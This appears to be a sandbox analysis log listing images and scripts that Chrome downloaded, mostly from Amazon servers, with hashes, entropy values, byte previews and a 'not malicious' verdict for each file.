                                                                                                                                                                                                                                                                SHA-512:C2FC58D71F0689343FC6E46CDE73854ACC9AF50FA1F9A85DB0BF4D3AE16680C922226CCA45414E262DBAC9FAB1D78FC017D3A4EEBEB7AD5DC6C54F5F0A4AB75A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/static/media/bg.f21cfbda.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........................................................................................{.....................................................................(......@....................@........(................................(.......@..P.... .......... ........... ..................................*...QD...@...@.. .........P..............................................AP*...@........... ........... .(.......(.@................................AQU..P,........@.....@..@....@..........!HR....................@.....P........J..-..(Ah.P................$......................@........T@...........(...@...J..l.YPZ ......................@..P ..............................@.@. .........J..,...*(P..h"..P... .. .@...@.............@.......................J......@.....`.T.QeKD..B.D........(......(X...D..`.........(........................(
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12738
                                                                                                                                                                                                                                                                Entropy (8bit):7.945991628874737
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WEvpjA1PjsZNlXZ2SNYVWu/d3COCjvWlMHcRwbQAc8ch9X6EEQxLcSNYLQU3IMvi:FjUPAZNlXkSCFC+ec27A9AQxL3uLQIet
                                                                                                                                                                                                                                                                MD5:044FC32AD8DC6C09B15CCC07821D9C8C
                                                                                                                                                                                                                                                                SHA1:C52398DB03C39B9CD527F0A14C03D327CA589DC6
                                                                                                                                                                                                                                                                SHA-256:A8633C641DC31777E889AA408B7F9D997228BBE675B6827863BA4C7C646722A7
                                                                                                                                                                                                                                                                SHA-512:5B719B521286CFA08378E6CF5BE4758FF5F2387D39343C266676A4BB503CC7CE603F5F49F85BC685AEC31E5DCCADC1FD43A97594D2E3DA0ADB2ABF8F97B8B5CB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81ZqHezuUOL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...................................................................<=5k../..r-w\.p.h...b...).0\G.L...Z..[Z.}).W-...1.l......0.....w0.Z........P.....8s............|-.{.*...l.Bg=j..l..z)y.p...........9......X.Q......._aq......58{SYI~.;.Q.b..x...M.x....mi.....\..~...EYYrX.b...M..?X....#l.....gx....f......>........f</q...a...O_..|..3.!.....l.?...N...|..!.7..K..-...T.....fP.".....)`....='.&.rb.l..}_..%.3......}......N..<..h.U.[..._..).2.t$.-}.m.<.....U..:.r...`.......;....f.....>...t.....~.y..#..T4.rs.e....._...;...T..o..7...p..4......=...I.<.~./..@....LH.w......s..=....gV.c...6..+.e>.....ix./...._.Y9....V...f..c...y3..1Z....1.sv.=w0..5....c...x..`...O.eyO...B..L..;..eV.JU....../.Pc.0...&...J..H.d.<.<...L.V..(.76..2p..l.!-~R.s..oq..%}...I.}...@.ce.9..%.b....D....t.V.$.{
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2472
                                                                                                                                                                                                                                                                Entropy (8bit):7.6468462902863985
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r1WJ2HEijHWy0pmftQlVkM19Tl68Ehm/QsyexVdPgMMyr4q:TV2tHWjmClVkAZl68Ehm/XyeVrB
                                                                                                                                                                                                                                                                MD5:EB993BFE3F1F021FB7DA7013C29C3D81
                                                                                                                                                                                                                                                                SHA1:0132D3D2C834A8BBD45BE77F8580F9111A0A877D
                                                                                                                                                                                                                                                                SHA-256:4D4DB5AB748F8A90617CF79BEBC9253CEB4BAABCB9EEDE1B906078524267653B
                                                                                                                                                                                                                                                                SHA-512:43940475DC9C577BD85622744FD03F9E7F33BE2D772E6BA2C076F95139FDFCCB110A9AAB12776AE5907A8F5DCF72EE5CBF0AEE4E0B172E20C14741BA71F18754
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................1.!Q.Aq..2Ra...."Bb...#3Sr..$..................................................!1.".AQ2............?...........y9.')<${R.i..O..^.};....l.s.-....).3.h...b.~R^.q<.7..G$=.H.-!.]xn..aK..._8.s..........*...}.,.k.'..T|.V.n.cn....o..P.....aZ..I.!.....^.....u*{..S.p}..Lj.;N_.v..^.3.%.G;.]5..=N.|../U...................j^U...r.Y.s.r[".p.Vy ..j.I..F.^...4.t.],lY:91TBzU......t.a..k....$'.[..B.<w.POe.....-.ru<.....(...,..n.R.a?........v...:..%(<4....\.Mr}.8U".I.t+%.S....f..... ............g={[-.......y|../.5...1...H.<...`I..d.'..q,.ac...LR#....)Tk8.=.od/.].....$.Z{E.....g;B.1..Q....Yo.V.D..M.N..J.2..{#.6.3Lx$.\...Q...V......>.9..>..e...%.9f..X..7}I...9p.I/..E.}..C..\/F..s........y.:.i...Z..8.G...QJ.=Y3l._..............Y.T..B.F..~)3G.&V.!.DjFq|.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8863
                                                                                                                                                                                                                                                                Entropy (8bit):7.933874073244524
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:2vQpqtbj/o9TJIuDm+mUqRWgyMjtnbgn4oEqjt:2vwqFo4DUBg3Fbk4o7jt
                                                                                                                                                                                                                                                                MD5:EC845C7DAAD5043DE9618244ED001C80
                                                                                                                                                                                                                                                                SHA1:38FA768CC5503B8304B241E9DCC48DA63AC8DEFA
                                                                                                                                                                                                                                                                SHA-256:D09ACDA9F0A36F1D534D4730EAEFD21AF24E553856C192B13D6CEAD9FC0B2E66
                                                                                                                                                                                                                                                                SHA-512:E680E423DA94DBFD78220EB60D47A9A7E2603DAEB4D002CADAA5E3787DA3FB3E24E1344E3367147E1E1364C4B237914F05EEF4452FBBE67382B06D0309837CC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.............................................................../2.@I%^...yf...G.f..k6.x2..!NMwLj3.<....P.....z.C.z...zyv.I........ .E'f...b..3.9.A...:d.K.T.......4......{m..n.no...m...(......XARU-......G..*..I...|..N....=".C.D..;...jj..~...P.B.m....@.....'.Ds.3\V.r.`.HdUz%...Z..2.Yd....-t...SE.JC....MxQ.M,.T......x.9VG1d....W..I.G.a.M\.....+'}J.i....@...sQ.Y....L.p..Q....Y...0...E...|.1.X.$.E...D...i:....x@..J.5.....].U-.l....*_Jr.fs.....\..5.6.Lf.6.X.9..".x.}.V..4.J..y....pN{q.e..I?Pr~..Yw./#..r..W.|....$.,...0.Ixm."NV......'Z..x...e.O.\..7$X..U6........Q..<.....i.%..Bfe6.g.lA\U.r.V......W.VY..y_L.Qa.].C!.2.u.....5.{...o..;......c..........{k...k.:Y`.,........Kl.#.XaF..I.<@y....MW.r.Z3@......E ..........Z;.....o....I...-I.o....8Y..{#...,.Y...-8..X.6.h.S..z.....8+.q.\.@
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3859
                                                                                                                                                                                                                                                                Entropy (8bit):7.7580495385560475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:n+Pp+uyDVBPeFZKiaSR2/RZzO4qyD0hM93:n0wdPDVR9qa0Kx
                                                                                                                                                                                                                                                                MD5:47E6362325B51AF9B9A01D855070810B
                                                                                                                                                                                                                                                                SHA1:09E631CD9343A5878566C2368DC7BE4E68E8132D
                                                                                                                                                                                                                                                                SHA-256:E3535F690F9EA1270D88D1DE7B4FCA4AB1D45B19E9241F100477EF32C4CF7651
                                                                                                                                                                                                                                                                SHA-512:41BC909BA4C104D2479B48406702A7A39283778977DFAF8402951BFB0AFD1827953FDC877F1D68F0AB019D188DF754E61994FF2E292BBD71B37C608702F09F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........6......................................................................7..............`...b.[w.L...J._]e..k.."..............*...6W..|..Nb...E...f\.dmx..0.......6....DZ..7`...j......4....eN.?k....f. .......-;/....../4./Z~..N.>.&K..Z.{JC...,!...Q........+Mi9..iOg.......XG.7.....w...... ...............U....N..v=....q1...O.................Y.............................%5E.!6Ua..&14@AVe....$7DFQTq..."0PWu........'8Gdtw................?......g..&[.R....9.Q!.. ....\a2...O....s......)75&.?...1s...[.d.5i/.t.2.#n{@cWIP.Y3.[..J.w(,.M.....msGq....2...X5z..k.W.!....!..0.<..8G..h.....D..Q$.2..0.U...5?TF[%5N<...2...\u..4.?J....C......N..S..I2I....n.4.S..C..M.#........&...J.Ri5...d..#....?DG.@.".....@..Kw...u.r.I.-.....p...-..K....c.0..n.+.)......jL.+...Oh..C.....Lc*\....u5...Z.o....C.e....w.`K..S=_
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 219x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7347
                                                                                                                                                                                                                                                                Entropy (8bit):7.947096958801787
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:LW3m5aJ34UaPDQWGrIPVnyg0rQPJ3vecEYVLDWTKy+HxH2:LW3m5TTDorIRvik3vzEYxW5+HV2
                                                                                                                                                                                                                                                                MD5:A1618E2DBD660E5E0148A8AF60E6138F
                                                                                                                                                                                                                                                                SHA1:40282B6CB047BAFD8F88973DD7B1C15906B735B2
                                                                                                                                                                                                                                                                SHA-256:1D9BF1511006BD908CB4D88368EF9D850B33F21CCA29A5A7B446806D35EAB468
                                                                                                                                                                                                                                                                SHA-512:F247F3AE41E8B18C3E8A6BB3A7850B28148909F7C89F1A593855CB257EA3EDABE93534162714DA4B4B38A5D253E11DCC80AED8F774F24A472138C7C45DEB7BDC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.A."Qaq..2BR.....#br.s.$3S...4c.%.........................................................!1AQ.."aqr..#2....$3..R................?..Z...!.@....!.@....!.@............*..zd.p.?.D.[Rv.-|.?W...'c.....[..Zi58.5.sO+#ok....1>.8..p2.h\t..W?....Ff+.4..L..y...<.....f7.M._...$..o....ql.t.#..9..J...C...W.b..C.2....sX2...v..U}N."..l-.s.....3..5?...{....}.X\=....w<i..A.u.z...o..}M6%R*....,.....C...\.n.8<g...lA..Z......u.3........'..^.........ms.*..v=....a.c..,.N.H?..|...,.....*P{.B..8.. ..B... ..B... ..B...........$....er\c.....=....}....&...M*..o4.^......|...............q.g...RNG8?.s.s;S.....9.[.q..:c~..7j.{5w......'.x...n$..T9.....F..Q....h.../...q...1.h......S.3#...w...6..3...:p&$H(^.I.6m...?y.v...$.c...)....5c....`.@Z.Q..............%.i.o.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                Entropy (8bit):7.908400268313229
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T1lewmvnLua2bE4kw74+z+R/NmiwEM3pcUJOw9jolaD:/ew2LGl4+iLmiwEe9j9
                                                                                                                                                                                                                                                                MD5:649B4EE9FE24FBF8B26690F4E4818AC4
                                                                                                                                                                                                                                                                SHA1:620E71A4EA5BA6722CB09DC16A0EAFAFCE0DA212
                                                                                                                                                                                                                                                                SHA-256:623DCBDFF322275F0A61572330F94EE0A43E4ECDEB4B12CFF2354C52770B74D2
                                                                                                                                                                                                                                                                SHA-512:B1A46FB51CF3AC899A27E753F42AA3414738E5EBAAB29D8E8D4C91C8313BD50B5272A2EA6BDD089F324C2520CE23534826921A136F10526CE7301CB2A670EC90
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1."A..2Q.#aq..3BRb...$......U.............................................1.!A..2QBRaq............?..:R.c.)JP.R..."..I.u.8...T@;.'.(.ZV.={O..K..x#Y.L..0"..g!w.q...lj......a......L...t...J....?.....8..|.)\......,p.......]2..)..G\eN..J.=_..}.?....-.....+.+.k.....R.8)JP.R......)@*...N- ...LR[.... s....L...T.u.*..p..O..I.OX...9w.:E-...;...0E..]...EuMFI.q.+ev. .|.0............f..-4xt;....X`IM....`..T.....TD..O...O.K.v.+..Heq...qN..K.u`.m .=..}.jW7.<.^..\...T..o...b..../:.F..G.)]H[mA.;....s.\..k.k[.ga.M.QJ..* (.......q..:..L..)..u...9#....NpA.^...2..1...`..{..7..^..=3Q.".......}b...Nm..c..I.A.@|..U..Ddpz..e[.......p....\^.+..^)._..P...#..4..4......f..........4.....]..&.....>..N|$.1......f.j.....b..t..)@)JP.R....8..J.A.:..V.=..b0Tm...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D728%26pc%3D16651%26at%3D16651%26t%3D1723469060973%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16651
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (607)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10158
                                                                                                                                                                                                                                                                Entropy (8bit):5.1802871493858484
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WiF4QtoZmosQwyi3aOxDxpL6shV/icawy8P+KexjLIvwEgveEHvuEfunuyUIK8AB:pto0oiPpL6shFiP8PX9I/PvV2yZ
                                                                                                                                                                                                                                                                MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                                                                                                                SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                                                                                                                SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                                                                                                                SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS
                                                                                                                                                                                                                                                                Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2082
                                                                                                                                                                                                                                                                Entropy (8bit):7.752862467783646
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rOFZBkRAFuTHiRTtfrA0++UdcRx5iT6UFR9pTUO++IvZOP:TrBazi3kiUdcRx5yDUO+vOP
                                                                                                                                                                                                                                                                MD5:8F8194B0368A3404D8FC1BBAE1817E22
                                                                                                                                                                                                                                                                SHA1:9A50268B1FF3C7491127D900EC4693FE6D66D3E3
                                                                                                                                                                                                                                                                SHA-256:B9BE7E1A7758971815AAB68A8210EE4A87A29C81F1E61A8A133BF6C1C17FD4B0
                                                                                                                                                                                                                                                                SHA-512:6A0D07C320B204129DE53980A44036ABD7D3697856D30816046845BFED1EF69158C8A4790DF559F78EC5305D952E7B38EEF67406E46F760918EBB4CEDD4A4ADC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Fitness_1x._SY116_CB659039825_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................1.!A.."2QRaq.5Bbt....#$..3..C..............................................1!"............?..""." "".' Lm.=....J>I...q..W..H.5d.K.VH.K..Z...yGcdw..xO}mO..GD.1...n..y...M.V[..V. ."...""." ""." "".p..B..K....$.d....W.\6.6.7......y>.{C..G..gjt.....V.s.....W.....5.....}.Ue?B'..g.r.r..u..>^.d.....w....<.V7{H.(.C....._S|-A...wWb{TJ...7..+>.^K..6...l..v..#..K.E.'.{q..}d.Z.5.J=gu<..e..wk.j....g=..my....*.......}.=-NE.U.#..N...lLW.Wi+..%.W.....b..,...........9Q....C..Z.@.s...... ..p.Q">+..Yp..X6=....O..+.....u.c.j.M..b=v..].>...wo..F.n'I...?..fQ.2.k......y.C..nq.....m...1.......V...z.......|..4..x[...2..c#....o..,...>.t.......d.......|.;O..l`......{..JC.'N.z....~6.Z..*....Gp.@.=....qF..s%....oO..D.^.K`..e/Z2(a.,..w....D@DD.D@DD..u
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):58
                                                                                                                                                                                                                                                                Entropy (8bit):4.364819634194334
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:j4OiLEF1vjdKDMJldsM9fkLHn:j4DErdKDMbdsN
                                                                                                                                                                                                                                                                MD5:B1935F865A4EADE8564B6EF4B022F27F
                                                                                                                                                                                                                                                                SHA1:F42746792E52473C4D9E152ACEB7080550D3C1E5
                                                                                                                                                                                                                                                                SHA-256:21C52B1622A4539BF82DBC7FD4A2638CDDE3B8151697EB5C4D3DBB426576FBAA
                                                                                                                                                                                                                                                                SHA-512:9693E0CAD83BF557BDADDE705241F580ED85DB0375AC381A21FC10E020FF96386E68514356C3B15FDCAF7BDCB8D74804D794E63D5BC9F58245DBB18B6C9A8062
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Standard Amazon AWS CloudFront Profile Experiment Response
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3517
                                                                                                                                                                                                                                                                Entropy (8bit):7.805470705852963
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:JNdjn+XvKwlFWtBrxTFKLsuA/DShlI7IXLK94sZ:JNpnEjWtBNTYLsx/DShlRbK94Q
                                                                                                                                                                                                                                                                MD5:F5256DBAC361D6E6CC711508E65CEA18
                                                                                                                                                                                                                                                                SHA1:79FE228703159B9996647C71DFF41E9E55BC9C72
                                                                                                                                                                                                                                                                SHA-256:7556377C7C03D50C4D64EF52F44AA62FBCDF0B660404E457FD352B16D14672B5
                                                                                                                                                                                                                                                                SHA-512:ADFFCAE7D59A60D7778F7AD87E9AF74F6E6AFE502D80A639FD2E53C966505271DB9C1BD817AB76F4AF99F4363A517482342A06AAD3F13D95BA358C6DB40A391F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........7....................................................................H................l\..7Y...E....c....-.?.....2:....2o.2.u....Q.{.#%.Re..]......IM...RFb..h........hxq........g.........N.k:N.#..i.9...D.._.ea..T..._....].7I%..D..W5"..i...*..+._.y..h.....^..r.B..ZR...6.k;.i..._.].i.?.5.P...slPz....LX...A.s.....}...q..c^..J_*..^G~...r..e;.o.(e=.c.v..w.r...iH.}...|..`>.....:O...!..d..4..................I.........................#3.CS....$c.....%04DTs....5Uet7P.........'............?..k>..:...n.):8...S8B".......8..z.g,q.M..VH.....+_..-GVX........gI=c.$q.$........:..m....vr.Q..%J!R.J..q..]..%.b.t.....Q.(...Vd.........r.....3D8..n.fR.iT..)...)..k`.%......n"......7..15....A.....rq...R.{.....|..^...._.3w.X....U.2..N.E-...@f.O.)..]...d..S.b...~.Sj(W#tH.i.!J....)K.E..yKA+2...T.P.W.J_k
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 155x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                                Entropy (8bit):7.885864424653992
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TfkGHn33dF42T6KAOZgKp93hdXuKiE+IBJN:win3/v6kZ93h0K3l
                                                                                                                                                                                                                                                                MD5:AAC1D24D179EB30264CC3900865E0300
                                                                                                                                                                                                                                                                SHA1:68A2E4FCF6A0E3F7161AB0C6DD8C6C89454AE973
                                                                                                                                                                                                                                                                SHA-256:990C4C79BD39FEA4255AA564351502EBFB30E4C381959CC9DA0214C9B0C8115B
                                                                                                                                                                                                                                                                SHA-512:2F3236E9243D11812B1E0EC2807619A0E6083EC32978D83BCE029F3EA466898396AAC7245D0A5553E5A56FA95B64F8999712EF5E5AD1CD4226CD8822E7FC620D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!1RTst......"25AQSUbr...%aq.......B.#$&C.46D............................................!..............?......Y3bo...\|..n?@..O{.e.,....p@>.C..d.w.*._o.3<.....-k\@h.4x.....<.y[..w...>T^'{...;..m..hkB...>..O...?.R..O..<..[......}..9Et...n.......)M....(z.g(.......@.....}..+M.._...P7Z..'9.[......t..R............W.$..;mY.$...[.......4......=&M%.{oY.d....2s......=!S.d.Ho.OHT..t..7...'<....'=.[.....R.$7..*.T.kP..|..)..|..(...o.....r.M.T...=....w.p{3.]...t7.....'<..z../<.z.....}s!l.....1.>..O..%[W..r4....v.y!w6.U..d..Z._+..{.dy.......@.X.P...{.q.UXd...${@.f..>6...+.X../\z..Un......^....y..G.i.;.}.....(...w..I.......$QK...Vh%-.......%....[.....V."...y].n.L..s...)@0o......[.4TA@.o...)po..%!@{.!...;.!.........h...*P..p...p
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3315
                                                                                                                                                                                                                                                                Entropy (8bit):7.868257366067716
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rmb11GraUKO+VJQrJnFYZAbQak+xsDcUsBuXGZhoytLFGZeidMb4X50SR7j3M:TVNnLJyQAEcdBBoytBGZEOj3ebcpN3U
                                                                                                                                                                                                                                                                MD5:659FB2B8145F18D9D2F22EA8C9A27142
                                                                                                                                                                                                                                                                SHA1:F8908689EEE5C4272A42B12178048E1CA77E9DD6
                                                                                                                                                                                                                                                                SHA-256:ED06D5CBDAE45BD5B20E26F4BE60A0113B5DEA9BE7DF287A4A4BB48A8F5E9F01
                                                                                                                                                                                                                                                                SHA-512:5D8A05A7E8F797D539D73A786E26CB8E676AFE6E4B594345BCCB8F3BAD621502B10AAD0FA931EA955A395EDCEBDEDA76286DC1028F710ED0FEF5BA571BE46FEE
                                                                                                                                                                                                                                                                Malicious:false
